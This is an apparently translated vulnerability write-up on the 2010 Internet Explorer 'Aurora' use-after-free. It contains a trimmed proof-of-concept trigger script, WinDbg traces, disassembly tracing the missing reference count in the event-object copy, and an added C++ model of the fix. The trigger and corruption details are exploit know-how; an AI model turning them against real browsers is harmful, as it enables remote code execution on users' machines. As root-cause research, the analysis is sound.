Exploring the principles of the IE Aurora vulnerability - Vulnerability Warning - Black Bar Safety Net

2010-02-01T00:00:00
ID MYHACK58:62201026122
Type myhack58
Reporter Anonymous
Modified 2010-02-01T00:00:00

Description

Details: http://bbs.xfocusx.com/thread-7873-1-1.html, by: xuanyuan small Cong. This article refers to the following articles:

[1] http://www.geoffchappell.com/viewer.htm?doc=notes/security/aurora/index.htm
[2] http://securitylabs.websense.com/content/Blogs/3530.aspx
[3] http://www.securityfocus.com/archive/1/508961

Of these, [1] gives an extremely detailed commentary on the vulnerability but falls short of telling you how to debug it; I only understood what was going on after reading it. [2] gives a brief overview, while [3] gives the debugging hint directly.

So what follows is simply a record of the debugging I did after reading the articles above, with the debugging steps and my understanding put in some order; the conclusions are not originally my own.

Debugging environment: Simplified Chinese Windows XP SP3 with IE7. (IE6 jumps into the shellcode more easily; with IE7 the probability of landing in the shellcode seems small. Since the aim here is to discuss how the vulnerability works, this does not matter: even when IE7 does not jump into the shellcode, the access to an invalid address still throws an exception, so the debugger still breaks and the analysis below is unaffected.)

First, look at the PoC page; the heap spray and similar parts are omitted here, the full version is in the attachment:

Reference:

......
function ev1(evt)
{
    event_obj = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 1);
}

function ev2()
{
    ......
    event_obj.srcElement;
}
......

<body>
<span id="sp1">
<img src="aurora.gif" >
</span>
</body>

Put simply: the body contains a span object, and the span contains an img object. In the img's onload handler, createEventObject is called to create a copy of the corresponding event object; the span's innerHTML is then emptied, which causes the img object to be released. After that a timer is created, and the timeout routine accesses the new event object's srcElement property; this should be the point at which the vulnerability is triggered.

Load IE7 under WinDbg (with the PoC file name as the command-line parameter). IE7 shows the prompt that web scripts or ActiveX objects have been blocked; confirm to allow them to run, wait a while, and the following exception is thrown:

Reference:

(300.1ec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001ec7b0 ebx=44003000 ecx=44003000 edx=00206418 esi=02b609d8 edi=ffffffff
eip=3e5b1e60 esp=019df818 ebp=019df838 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CElement::Doc:
3e5b1e60 8b01            mov     eax,dword ptr [ecx]  ds:0023:44003000=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:005> kb
ChildEBP RetAddr  Args to Child
019df814 3e582b2b 001f8af8 01e23920 3e80f27c mshtml!CElement::Doc
019df838 3e67f828 01e23928 000003e9 019df870 mshtml!CEventObj::GenericGetElement+0x99
019df848 3e66d9c5 001ec768 01e23928 00988690 mshtml!CEventObj::get_srcElement+0x15
019df870 3e5b88a8 001ec768 00988690 001f8af8 mshtml!GS_IDispatchp+0x38
019df908 3e5b8dd9 001ec768 000003e9 3e66d989 mshtml!CBase::ContextInvokeEx+0x4ef
019df934 75be29d7 001ec768 000003e9 00000409 mshtml!CBase::InvokeEx+0x25
019df96c 75be2947 00986940 001caa30 000003e9 jscript!IDispatchExInvokeEx2+0xac
019df9a4 75be31e5 00986940 001caa30 000003e9 jscript!IDispatchExInvokeEx+0x56
019dfa14 75be1c0a 00986940 001caa30 000003e9 jscript!InvokeDispatchEx+0x78
019dfa5c 75be2fc3 00986940 019dfaac 00000002 jscript!VAR::InvokeByName+0xba
019dfb10 75be1123 019dfb54 00000000 009860b0 jscript!CScriptRuntime::Run+0xa7a
019dfb28 75be0f8a 019dfb54 00000000 00000000 jscript!ScrFncObj::Call+0x8d
019dfb98 75be2642 009860b0 019dfdb0 00000000 jscript!CSession::Execute+0xa7
019dfc88 75be24fe 00000000 00000001 019dfda0 jscript!NameTbl::InvokeDef+0x179
019dfd08 75be2e10 009860b0 00000000 00000000 jscript!NameTbl::InvokeEx+0xcb
019dfd38 3e5a76df 009860b0 00000000 3e5b1414 jscript!NameTbl::Invoke+0x55
019dfdcc 3e5a763d 00204ee8 001c8060 00002000 mshtml!CWindow::ExecuteTimeoutScript+0x85
019dfe14 3e5a7611 001c97b8 001c97f1 019dfe48 mshtml!CWindow::FireTimeOut+0x91
019dfe24 3e5a77b5 00002000 019dfeb0 3e5b1551 mshtml!GWMouseProc+0x152
019dfe48 77d18734 0013020a 000000d6 00002000 mshtml!GlobalWndProc+0x181

The stack backtrace shows that the exception indeed occurs when the timer routine uses event_obj.srcElement.

The point that triggers the exception is very easy to find, but finding out why is not.

The key is understanding how CEventObj::get_srcElement is implemented, and why it is implemented that way; I only understood this after reading [1]. Put simply, to let the event reach its corresponding element, CEventObj does not store a CElement pointer directly in its own class but goes through a few indirections: when the CImgElement object is created, a corresponding CTreeNode object is created, and the CImgElement class pointer is stored in an attribute of that CTreeNode object. The address of the CTreeNode object is then stored in an EVENTPARAM structure inside the img's event object, CEventObj.

For this, reference [3] directly gives the debugging hint:

Reference:

If you're interested in researching the vulnerability (using this PoC), breakpoint MSHTML!CImgElement::CImgElement, then run until MSHTML!CTreeNode::CTreeNode is hit -- this tree node is freed during MSHTML!CImgHelper::Fire_onerror, but is later accessed during MSHTML!CEventObj::get_srcElement.

Reload, and at the initial breakpoint enter the command bu mshtml!CImgElement::CImgElement, then g to run. It stops at the breakpoint once; g again, IE7 shows the prompt that web scripts or ActiveX objects have been blocked, confirm to allow them to run, wait a while for the heap spray to finish, and it then breaks in CImgElement::CImgElement:

Reference:

Breakpoint 0 hit
eax=002033d0 ebx=001ae3bc ecx=002033d0 edx=00000034 esi=001ae308 edi=0022ffe8
eip=3e553f4e esp=019dfb9c ebp=019dfba8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CImgElement::CImgElement:
3e553f4e 8bff            mov     edi,edi

This gives the pointer to the CImgElement object being created: ecx=002033d0.

Set bu CTreeNode::CTreeNode, run, and it breaks as follows:

Reference:

0:005> bu mshtml!CTreeNode::CTreeNode
0:005> g
Breakpoint 1 hit
eax=02b60880 ebx=00000000 ecx=02b60880 edx=00150608 esi=001db518 edi=00000055
eip=3e586fe7 esp=019dfb7c ebp=019dfb90 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode:
3e586fe7 8bff            mov     edi,edi
0:005> kb
ChildEBP RetAddr  Args to Child
019dfb78 3e53ffc3 00203380 002033d0 00000000 mshtml!CTreeNode::CTreeNode
019dfb90 3e551f3d 019dfbe0 002033d0 00203380 mshtml!CHtmRootParseCtx::BeginElement+0x37
019dfbb8 3e53ff25 019dfbe0 002033d0 00203380 mshtml!CHtmTextParseCtx::BeginElement+0x71
019dfbe4 3e54012b 00000000 00000001 00000000 mshtml!CHtmParse::BeginElement+0x8c
019dfc08 3e53eb07 00000000 0022ffe8 00000000 mshtml!CHtmParse::ParseBeginTag+0x112
019dfc20 3e53fad6 00000034 00fa84cc 001de4a8 mshtml!CHtmParse::ParseToken+0x76
019dfcc8 3e53b620 00fa84cc 001c7fb0 001de4a8 mshtml!CHtmPost::ProcessTokens+0x1a4
019dfd84 3e53bd97 00fa84cc 001c7fb0 001de4a8 mshtml!CHtmPost::Exec+0x15d
019dfd9c 3e53bd18 00fa84cc 001c7fb0 001de4a8 mshtml!CHtmPost::Run+0x13
019dfdb4 3e53c38f 001c7fb0 00fa84cc 001de4a8 mshtml!PostManExecute+0xdc
019dfdd4 3e53c2fc 001de4a8 00000001 019dfdf4 mshtml!PostManResume+0x9e
019dfde4 3e59f3ff 001fa800 001de4a8 019dfe28 mshtml!CHtmPost::OnDwnChanCallback+0x10
019dfdf4 3e5b79e2 001fa800 00000000 00000000 mshtml!CDwnChan::OnMethodCall+0x19
019dfe28 3e5b1602 019dfeb0 3e5b1551 00000000 mshtml!GlobalWndOnMethodCall+0x101
019dfe48 77d18734 000e021c 000000d4 00000000 mshtml!GlobalWndProc+0x181
019dfe74 77d18816 3e5b1551 000e021c 00008002 USER32!InternalCallWinProc+0x28
019dfedc 77d189cd 00000000 3e5b1551 000e021c USER32!UserCallWinProcCheckWow+0x150
019dff3c 77d18a10 019dff64 00000000 019dffb4 USER32!DispatchMessageWorker+0x306
019dff4c 3ed3e70b 019dff64 0013e490 0013e5b8 USER32!DispatchMessageW+0xf
019dffb4 7c80b699 001ab490 0013e490 0013e5b8 GETTING!CTabWindow::_TabWindowThreadProc+0x189

You can see it is called from CHtmRootParseCtx::BeginElement; ecx=02b60880 is the CTreeNode class pointer, and the function's second parameter, 002033d0, is the CImgElement class pointer that was just created. The function calls CTreeNode::SetElement to associate the CImgElement with the CTreeNode:

Reference:

.text:3E586FEC                 push    esi
.text:3E586FED                 push    [ebp+pCElementObject]
.text:3E586FF0                 mov     esi, ecx
.text:3E586FF2                 or      word ptr [esi+0Ah], 0FFFFh
.text:3E586FF7                 or      word ptr [esi+0Ch], 0FFFFh
.text:3E586FFC                 or      word ptr [esi+0Eh], 0FFFFh
.text:3E587001                 mov     dword ptr [esi+10h], 1
.text:3E587008                 call    CTreeNode::SetElement(CElement *)

Reference:

.text:3E586F69 public: void __thiscall CTreeNode::SetElement(class CElement *) proc near
.text:3E586F69                                         ; CODE XREF: CTreeNode::CTreeNode(CTreeNode *,CElement *)+21p
.text:3E586F69
.text:3E586F69 pCElementObject = dword ptr  8
.text:3E586F69
.text:3E586F69                 mov     edi, edi
.text:3E586F6B                 push    ebp
.text:3E586F6C                 mov     ebp, esp
.text:3E586F6E                 mov     eax, [ebp+pCElementObject]
.text:3E586F71                 test    eax, eax
.text:3E586F73                 mov     [ecx], eax
.text:3E586F75                 jz      short loc_3E586F7D
.text:3E586F77                 mov     al, [eax+14h]
.text:3E586F7A                 mov     [ecx+8], al
.text:3E586F7D
.text:3E586F7D loc_3E586F7D:                           ; CODE XREF: CTreeNode::SetElement(CElement *)+Cj
.text:3E586F7D                 pop     ebp
.text:3E586F7E                 retn    4
.text:3E586F7E public: void __thiscall CTreeNode::SetElement(class CElement *) endp

Having stepped through the section above, the page's script next uses createEventObject to create a copy of the event, and this is where things go wrong: the new CEventObj naturally copies the original object's EVENTPARAM structure, but as [1] explains, only the content of the EVENTPARAM structure is copied, and the CTreeNode's reference count is not incremented! CEventObj::Create calls EVENTPARAM::EVENTPARAM to copy the EVENTPARAM structure, but the latter contains no code that increments the reference count of the CTreeNode held in it (as the later analysis of CEventObj::get_srcElement shows, the CTreeNode class pointer sits at the head of the EVENTPARAM structure).

Reference:

.text:3E6B4BC9 loc_3E6B4BC9:                           ; CODE XREF: CEventObj::Create(IHTMLEventObj **,CDoc *,CElement *,CMarkup *,int,ushort *,EVENTPARAM *,int)+84j
.text:3E6B4BC9                 push    0D8h            ; dwBytes
.text:3E6B4BCE                 call    _MemAlloc(x)
.text:3E6B4BD3                 test    eax, eax
.text:3E6B4BD5                 jz      short loc_3E6B4BE3
.text:3E6B4BD7                 push    [ebp+arg_18]
.text:3E6B4BDA                 mov     ecx, eax
.text:3E6B4BDC                 call    EVENTPARAM::EVENTPARAM(EVENTPARAM const *)
.text:3E6B4BE1                 jmp     short loc_3E6B4BE5

.text:3E582A41 public: __thiscall EVENTPARAM::EVENTPARAM(struct EVENTPARAM const *) proc near
.text:3E582A41                                         ; CODE XREF: CElement::get_nodeType(long *)-164050p
.text:3E582A41                                         ; .text:3E5BFDC3p
.text:3E582A41                                         ; .text:3E5C2363p
.text:3E582A41                                         ; CElement::FireStdEvent_KeyHelper(CTreeNode *,CMessage *,int *,EVENTINFO *)+7Ap
.text:3E582A41                                         ; CElement::get_nodeType(long *)-7B645p
.text:3E582A41                                         ; CElement::get_nodeType(long *)+5FEBp ...
.text:3E582A41
.text:3E582A41 pEventParam     = dword ptr  8
.text:3E582A41
.text:3E582A41                 mov     edi, edi
.text:3E582A43                 push    ebp
.text:3E582A44                 mov     ebp, esp
.text:3E582A46                 push    ebx
.text:3E582A47                 mov     ebx, ecx
.text:3E582A49                 push    esi
.text:3E582A4A                 mov     esi, [ebp+pEventParam]
.text:3E582A4D                 push    edi
.text:3E582A4E                 xor     eax, eax
.text:3E582A50                 lea     edi, [ebx+48h]
.text:3E582A53                 stosd
.text:3E582A54                 stosd
.text:3E582A55                 stosd
.text:3E582A56                 stosd
.text:3E582A57                 xor     edx, edx
.text:3E582A59                 mov     [ebx+0C4h], edx
.text:3E582A5F                 mov     [ebx+0C8h], edx
.text:3E582A65                 mov     [ebx+0CCh], edx
.text:3E582A6B                 mov     [ebx+0D0h], edx
.text:3E582A71                 push    36h
.text:3E582A73                 pop     ecx
.text:3E582A74                 mov     edi, ebx
.text:3E582A76                 rep movsd               ; directly copy the content
.text:3E582A78                 mov     eax, [ebx+64h]
.text:3E582A7B                 and     dword ptr [ebx+0A8h], 0FFFFFBFFh
.text:3E582A85                 add     dword ptr [eax+8], 8
.text:3E582A89                 mov     eax, [ebx+68h]
.text:3E582A8C                 cmp     eax, edx
.text:3E582A8E                 jz      short loc_3E582A94
.text:3E582A90                 add     dword ptr [eax+8], 8
.text:3E582A94
.text:3E582A94 loc_3E582A94:                           ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const *)+4Dj
.text:3E582A94                 mov     eax, [ebx+6Ch]
.text:3E582A97                 cmp     eax, edx
.text:3E582A99                 jnz     loc_3E6A4170
.text:3E582A9F
.text:3E582A9F loc_3E582A9F:                           ; CODE XREF: CElement::get_nodeType(long *)+13875j
.text:3E582A9F                 mov     eax, [ebx+84h]
.text:3E582AA5                 cmp     eax, edx
.text:3E582AA7                 jnz     loc_3E6A4179
.text:3E582AAD                 jmp     loc_3E6A4181
.text:3E582AAD public: __thiscall EVENTPARAM::EVENTPARAM(struct EVENTPARAM const *) endp
.text:3E582AAD
.text:3E582AB2 loc_3E582AB2:                           ; CODE XREF: CElement::get_nodeType(long *)+138EEj
.text:3E582AB2                 pop     edi
.text:3E582AB3                 pop     esi
.text:3E582AB4                 mov     eax, ebx
.text:3E582AB6                 pop     ebx
.text:3E582AB7                 pop     ebp
.text:3E582AB8                 retn    4

.text:3E6A4170 loc_3E6A4170:                           ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const *)+58j
.text:3E6A4170                 add     dword ptr [eax+8], 8
.text:3E6A4174                 jmp     loc_3E582A9F
.text:3E6A4179 ; ---------------------------------------------------------------------------
.text:3E6A4179 loc_3E6A4179:                           ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const *)+66j
.text:3E6A4179                 mov     ecx, [eax]
.text:3E6A417B                 push    eax
.text:3E6A417C                 call    dword ptr [ecx+4]
.text:3E6A417F                 xor     edx, edx
.text:3E6A4181
.text:3E6A4181 loc_3E6A4181:                           ; CODE XREF: EVENTPARAM::EVENTPARAM(EVENTPARAM const *)+6Cj
.text:3E6A4181                 mov     eax, [ebp+lpMem]
.text:3E6A4184                 add     eax, 0C4h
.text:3E6A4189                 lea     ecx, [ebx+0C4h]
.text:3E6A418F                 push    eax
.text:3E6A4190                 mov     [ecx], edx
.text:3E6A4192                 call    CStr::Set(CStr const &)
.text:3E6A4197                 mov     esi, [ebp+lpMem]
.text:3E6A419A                 lea     eax, [esi+0C8h]
.text:3E6A41A0                 lea     ecx, [ebx+0C8h]
.text:3E6A41A6                 xor     edi, edi
.text:3E6A41A8                 push    eax
.text:3E6A41A9                 mov     [ecx], edi
.text:3E6A41AB                 call    CStr::Set(CStr const &)
.text:3E6A41B0                 lea     eax, [esi+0CCh]
.text:3E6A41B6                 lea     ecx, [ebx+0CCh]
.text:3E6A41BC                 push    eax
.text:3E6A41BD                 mov     [ecx], edi
.text:3E6A41BF                 call    CStr::Set(CStr const &)
.text:3E6A41C4                 lea     eax, [esi+0D0h]
.text:3E6A41CA                 lea     ecx, [ebx+0D0h]
.text:3E6A41D0                 push    eax
.text:3E6A41D1                 mov     [ecx], edi
.text:3E6A41D3                 call    CStr::Set(CStr const &)
.text:3E6A41D8                 lea     ecx, [ebx+48h]
.text:3E6A41DB                 xor     eax, eax
.text:3E6A41DD                 mov     edi, ecx
.text:3E6A41DF                 stosd
.text:3E6A41E0                 stosd
.text:3E6A41E1                 add     esi, 48h
.text:3E6A41E4                 stosd
.text:3E6A41E5                 push    esi             ; pvargSrc
.text:3E6A41E6                 push    ecx             ; pvargDest
.text:3E6A41E7                 stosd
.text:3E6A41E8                 call    VariantCopy(x,x)
.text:3E6A41ED                 jmp     loc_3E582AB2
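As an added illustration (not code from this article or from mshtml), the following C++ model replays the sequence analysed above with a toy CTreeNode whose reference count lives in the dword at offset 8 and is counted in units of 8, mirroring the "add dword ptr [eax+8], 8" instructions in the listing; the structure layouts, names and the "alive" flag standing in for the heap are assumptions. It places the vulnerable copy (no AddRef on the srcElement node, as EVENTPARAM::EVENTPARAM does) beside a hardened copy that takes its own reference, and shows which one leaves the timer's srcElement read pointing at a released node.

```cpp
#include <cstdint>

// Toy stand-in for CTreeNode (assumed layout, not mshtml's). mshtml keeps the
// reference count in the dword at offset 8 and bumps it in units of 8 because
// the low bits hold flags, hence "add dword ptr [eax+8], 8" in the listing.
struct TreeNode {
    uint32_t flagsAndRefs;  // bits 0-2: flags, bits 3 and up: reference count
    bool     alive;         // stands in for the heap: false once the node is freed
    void*    element;       // the wrapped CElement (the CImgElement here)
};
static const uint32_t REF_UNIT = 8;
static uint32_t refCount(const TreeNode& n) { return n.flagsAndRefs >> 3; }
static void addRef(TreeNode& n) { n.flagsAndRefs += REF_UNIT; }
static void release(TreeNode& n) {
    n.flagsAndRefs -= REF_UNIT;
    if (refCount(n) == 0) { n.alive = false; n.element = nullptr; }  // "freed"
}

// Toy EVENTPARAM: the srcElement tree node pointer sits at the head.
struct EventParam { TreeNode* srcNode; };

// Vulnerable copy, as the listing does: memberwise copy, no AddRef on srcNode.
EventParam copyWithoutAddRef(const EventParam& src) { return EventParam{src.srcNode}; }

// Hardened copy: the new event object owns its own reference to the node.
EventParam copyWithAddRef(const EventParam& src) {
    if (src.srcNode) addRef(*src.srcNode);
    return EventParam{src.srcNode};
}

// get_srcElement: succeeds only while the node is live. In mshtml the read of a
// freed node is what faults in CElement::Doc (or reads heap-sprayed data).
bool getSrcElement(const EventParam& ev, void** out) {
    if (!ev.srcNode || !ev.srcNode->alive) return false;
    *out = ev.srcNode->element;
    return true;
}

// Replays the PoC: img created (markup holds one reference), createEventObject
// copies the EVENTPARAM, innerHTML = "" drops the img, the timer reads srcElement.
bool replayAurora(bool hardened) {
    int img = 0;
    TreeNode node{REF_UNIT, true, &img};
    EventParam original{&node};
    EventParam copy = hardened ? copyWithAddRef(original) : copyWithoutAddRef(original);
    release(node);  // span.innerHTML = "" releases the markup's reference
    void* el = nullptr;
    return getSrcElement(copy, &el);  // false = a dangling pointer was about to be used
}
```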